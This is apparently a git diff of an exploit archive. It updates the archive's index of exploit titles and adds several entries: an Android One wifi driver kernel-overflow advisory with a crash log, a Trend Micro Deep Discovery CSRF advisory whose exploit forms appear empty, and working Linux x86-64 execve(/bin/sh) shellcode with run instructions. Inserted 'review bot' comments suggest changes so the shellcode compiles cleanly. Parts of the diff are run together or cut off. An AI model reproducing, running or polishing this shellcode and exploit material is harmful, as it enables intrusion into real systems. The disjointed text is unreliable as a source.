 38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0
-38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0
+38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0
 38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
 38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection Vulnerabilities",2015-10-30,"Curesec Research Team",php,webapps,0
 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
@@ -35137,11 +35137,11 @@ id,file,description,date,author,platform,type,port
 38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
 38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
-38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
-38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download v1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
-38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress v1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
+38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
+38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
+38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0
-38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= v8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0
+38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0
 38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload Vulnerability",2013-12-08,"Ashiyane 
Digital Security Team",php,webapps,0
 38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal Vulnerability",2013-12-11,"High-Tech Bridge",php,webapps,0
 38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0
@@ -35710,7 +35710,7 @@ id,file,description,date,author,platform,type,port
 39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
 39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
 39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
-39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
+39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
 39471,platforms/windows/dos/39471.txt,"STIMS Buffer - Buffer Overflow SEH - DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
 39472,platforms/windows/dos/39472.txt,"STIMS Cutter - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0
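Review bot: The rewritten 38871 row in the -35137 hunk still reads `8.6.1- Insecure File Permissions`, with no space before the hyphen, while the same hunk normalises the neighbouring 38867–38869 rows to the ` - ` separator the rest of the commit uses. Since this commit is a title-normalisation pass, the line should become `"Cyclope Employee Surveillance <= 8.6.1 - Insecure File Permissions"` so that searches and sort keys on the description column behave like the other entries.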
@@ -35800,6 +35800,7 @@ id,file,description,date,author,platform,type,port
 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
+39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent XSS",2016-03-28,"Sarim Kiani",multiple,webapps,80
 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
@@ -35828,6 +35829,7 @@ id,file,description,date,author,platform,type,port
 39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
+39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8_ 3.7 - CSRF Vulnerabilities",2016-03-27,hyp3rlinx,hardware,webapps,80
 39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0
@@ -35847,3 +35849,9 @@ id,file,description,date,author,platform,type,port
 39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0
 39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0
 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
+39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86_x64 - execve(/bin/sh) - 25 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
+39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86_x64 - execve(/bin/bash) - 33 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
+39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69
+39628,platforms/linux/local/39628.txt,"FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)",2016-03-28,"Google Security Research",linux,local,0
+39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0
+39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0
diff --git a/platforms/android/dos/39629.txt b/platforms/android/dos/39629.txt
new file mode 100755
index 000000000..acbb5e6a7
--- /dev/null
+++ b/platforms/android/dos/39629.txt
@@ -0,0 +1,163 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678 + +The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL. + +This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET. + +See ​ + hello-jni.tar.gz​ for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040. + +[ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G W 3.10.57-g9e1c396 #1 +[ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000 +[ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040 +[ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484 +[ 56.847092]-(0)[880:tx_thread]pc : [<40404040>] lr : [] psr: a0000013 +[ 56.847092]sp : cb99fdb0 ip : c001813c fp : cb99fe0c +[ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0 r9 : 0000af00 r8 : 00000110 +[ 56.849552]-(0)[880:tx_thread]r7 : 0000002c r6 : cc0a63c0 r5 : 00000001 r4 : c0cade08 +[ 56.850560]-(0)[880:tx_thread]r3 : 40404040 r2 : 00000040 r1 : dd5d0110 r0 : 00000001 +[ 56.851570]-(0)[880:tx_thread]Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel +[ 56.852675]-(0)[880:tx_thread]Control: 10c5387d Table: 9e9b006a DAC: 00000015 +[ 56.853585]-(0)[880:tx_thread] +[ 56.853585]LR: 0xc0408b64: +[ 56.854297]8b64 e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000 +[ 56.855306]8b84 01a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000 +[ 56.856314]8ba4 e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010 +[ 56.857323]8bc4 e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33 +[ 56.858332]8be4 e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000 +[ 56.859340]8c04 e12fff33 e59635cc e1a00007 
e5933004 e12fff33 e5959000 e2899f7d e5953000 +[ 56.860349]8c24 e30610c0 e1a00007 e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010 +[ 56.861358]8c44 e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014 +[ 56.862369]-(0)[880:tx_thread] +[ 56.862369]SP: 0xcb99fd30: +[ 56.863083]fd30 00000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110 +[ 56.864091]fd50 0000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110 +[ 56.865100]fd70 00000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00 +[ 56.866108]fd90 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff +[ 56.867117]fdb0 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000 +[ 56.868126]fdd0 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000 +[ 56.869135]fdf0 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28 +[ 56.870143]fe10 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14 +[ 56.871155]-(0)[880:tx_thread] +[ 56.871155]IP: 0xc00180bc: +[ 56.871868]80bc ee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 +[ 56.872877]80dc e203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001 +[ 56.873885]80fc 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312 +[ 56.874894]811c e2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e +[ 56.875902]813c e0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e +[ 56.876911]815c 00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a +[ 56.877920]817c e1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa +[ 56.878929]819c e1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01 +[ 56.879940]-(0)[880:tx_thread] +[ 56.879940]FP: 0xcb99fd8c: +[ 56.880653]fd8c 0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 +[ 56.881662]fdac ffffffff 00000001 00000000 c07aeeb8 
c029c4b0 c0b9d340 00000110 00000000 +[ 56.882671]fdcc 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 +[ 56.883679]fdec e54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 +[ 56.884688]fe0c c0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 +[ 56.885697]fe2c e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000 +[ 56.886705]fe4c c0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4 +[ 56.887714]fe6c c03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540 +[ 56.888726]-(0)[880:tx_thread] +[ 56.888726]R1: 0xdd5d0090: +[ 56.889439]0090 00000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193 +[ 56.890447]00b0 c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000 +[ 56.891456]00d0 ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8 +[ 56.892465]00f0 e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d +[ 56.893473]0110 00000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775 +[ 56.894482]0130 10b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc +[ 56.895491]0150 25b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad +[ 56.896499]0170 a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111 +[ 56.897511]-(0)[880:tx_thread] +[ 56.897511]R4: 0xc0cadd88: +[ 56.898224]dd88 c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.899233]dda8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.900241]ddc8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.901250]dde8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.902259]de08 41414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3 +[ 56.903267]de28 000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000 +[ 56.904276]de48 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.905285]de68 00000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000 +[ 56.906297]-(0)[880:tx_thread] +[ 56.906297]R6: 0xcc0a6340: +[ 56.907009]6340 00000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358 +[ 56.908018]6360 df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000 +[ 56.909027]6380 00000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000 +[ 56.910035]63a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.911044]63c0 dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000 +[ 56.912053]63e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.913062]6400 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.914070]6420 00000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000 +[ 56.915082]-(0)[880:tx_thread] +[ 56.915082]R10: 0xc0cac270: +[ 56.915806]c270 7f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000 +[ 56.916814]c290 00000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000 +[ 56.917823]c2b0 00000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000 +[ 56.918832]c2d0 00000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000 +[ 56.919840]c2f0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.920849]c310 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.921858]c330 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.922866]c350 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248) +[ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000) +[ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0 +[ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 
00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 +[ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000 +[ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28 +[ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 +[ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0 +[ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000 +[ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000 +[ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0 +[ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8 +[ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50 +[ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc +[ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48 +[ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000 +[ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead +[ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000 +[ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000 +[ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff +[ 56.948658]Backtrace: +[ 56.948966]-(0)[880:tx_thread][] 
(kalDevPortWrite+0x0/0x484) from [] (nicTxCmd+0x354/0x638) +[ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000 +r4:e54b6168 +[ 56.951190]-(0)[880:tx_thread][] (nicTxCmd+0x0/0x638) from [] (wlanSendCommand+0x194/0x220) +[ 56.952449]-(0)[880:tx_thread][] (wlanSendCommand+0x0/0x220) from [] (wlanProcessCommandQueue+0x24c/0x474) +[ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001 +[ 56.954568]-(0)[880:tx_thread][] (wlanProcessCommandQueue+0x0/0x474) from [] (tx_thread+0x310/0x640) +[ 56.955927]-(0)[880:tx_thread][] (tx_thread+0x0/0x640) from [] (kthread+0xbc/0xc0) +[ 56.957088]-(0)[880:tx_thread][] (kthread+0x0/0xc0) from [] (ret_from_fork+0x14/0x3c) +[ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc +[ 56.958970]-(0)[880:tx_thread]Code: bad PC value +[ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]--- +[ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception + +The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632 + + case PRIV_CMD_SW_CTRL: + pu4IntBuf = (PUINT_32)prIwReqData->data.pointer; + prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0]; + + //kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8); + if (copy_from_user(&prNdisReq->ndisOidContent[0], + prIwReqData->data.pointer, + prIwReqData->data.length)) { + status = -EFAULT; + break; + } + prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL; + prNdisReq->inNdisOidlength = 8; + prNdisReq->outNdisOidLength = 8; + + /* Execute this OID */ + status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen); + break; + +prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39629.zip + 
diff --git a/platforms/hardware/webapps/39622.txt b/platforms/hardware/webapps/39622.txt new file mode 100755 index 000000000..8ea95380f --- /dev/null +++ b/platforms/hardware/webapps/39622.txt @@ -0,0 +1,360 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt + + +Vendor: +==================== +www.trendmicro.com + + +Product: +========================================= +Trend Micro Deep Discovery Inspector +V3.8, 3.7 + +Deep Discovery Inspector is a network appliance that gives you 360-degree +network monitoring of all traffic +to detect all aspects of a targeted attack. + + +Vulnerability Type: +================================ +Cross Site Request Forgery - CSRF + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +================================ + +Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an +authenticated user visits an malicious webpage attackers will +have ability to modify many settings of the Deep Discovery application to +that of the attackers choosing. + + +Reference: +http://esupport.trendmicro.com/solution/en-US/1113708.aspx + +Trend Micro DDI is affected by CSRF vulnerabilities. These affect the +following console features: + +Deny List Notifications +Detection Rules +Threat Detections +Email Settings +Network +Blacklisting/Whitelisting +Time +Accounts +Power Off / Restart +DETAILS +The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are +affected: + +3.8 English +3.8 Japanese +3.7 English +3.7 Japanese +3.7 Simplified Chinese +Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 +must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue. + + +Exploit code(s): +=============== + + +1) Shut down all threat scans and malicious file submissions under: + Administration /Monitoring / Scanning / Threat Detections + + + +
+ + + + + + + + + +
+ + +2) Whitelist C&C server menu location: Detections / C&C Callback Addresses + +
+ + + + + +
+ + +3) Turn off or change email notifications + +
+ + + + + + + + + + + + + + + + + + + + + +
+ +4) Change system settings ( x.x.x.x = whatever IP we want ) + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +Disclosure Timeline: +======================================= +Vendor Notification: November 23, 2015 +March 25, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +High + + +Description: +======================================================================== + +Request Method(s): [+] POST + + +Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8 + + +======================================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/lin_x86-64/shellcode/39624.c b/platforms/lin_x86-64/shellcode/39624.c new file mode 100755 index 000000000..1849e3b43 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39624.c 
@@ -0,0 +1,51 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_x64 - execve(/bin/sh) - 25 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+Thanks for Unknown Commented in my Blog
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+ 400080: eb 0b jmp 0x40008d
+ 400082: 5f pop rdi
+ 400083: 48 31 d2 xor rdx,rdx
+ 400086: 52 push rdx
+ 400087: 5e pop rsi
+ 400088: 6a 3b push 0x3b
+ 40008a: 58 pop rax
+ 40008b: 0f 05 syscall
+ 40008d: e8 f0 ff ff ff call 0x400082
+ 400092: 2f (bad)
+ 400093: 62 (bad)
+ 400094: 69 .byte 0x69
+ 400095: 6e outs dx,BYTE PTR ds:[rsi]
+ 400096: 2f (bad)
+ 400097: 73 68 jae 0x400101
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o sh_shell sh_shell.c
+$ execstack -s sh_shell
+$ ./sh_shell
+
+---------------------------------------------------------------------------------------------------
+*/
+#include
+char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+void main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) sh;
+ (int)(*func)();
+}
diff --git a/platforms/lin_x86-64/shellcode/39625.c b/platforms/lin_x86-64/shellcode/39625.c
new file mode 100755
index 000000000..8ea5d36cc
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39625.c
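Review bot: `void main(int argc, char **argv)` is not a standard signature and neither parameter is used; `int main(void)` with a `return 0;` at the end lets the harness build cleanly under `-Wall -Wextra`. The `#include` line carries no header name as shown on the page (most likely lost in rendering), so the file as displayed does not compile; since the body uses nothing from the standard library, either restore the header or drop the line. `int (*func)();` declares a function without a prototype and the `(int)` cast on `(int)(*func)();` changes nothing since the value is discarded anyway; `int (*func)(void);` and a plain `func();` say the same thing without the noise. The same three points apply to 39625.c in the next hunk.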
@@ -0,0 +1,52 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_x64 - execve(/bin/bash) - 33 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+ 400080: eb 0b jmp 0x40008d
+ 400082: 5f pop rdi
+ 400083: 48 31 d2 xor rdx,rdx
+ 400086: 52 push rdx
+ 400087: 5e pop rsi
+ 400088: 6a 3b push 0x3b
+ 40008a: 58 pop rax
+ 40008b: 0f 05 syscall
+ 40008d: e8 f0 ff ff ff call 0x400082
+ 400092: 2f (bad)
+ 400093: 2f (bad)
+ 400094: 2f (bad)
+ 400095: 2f (bad)
+ 400096: 62 (bad)
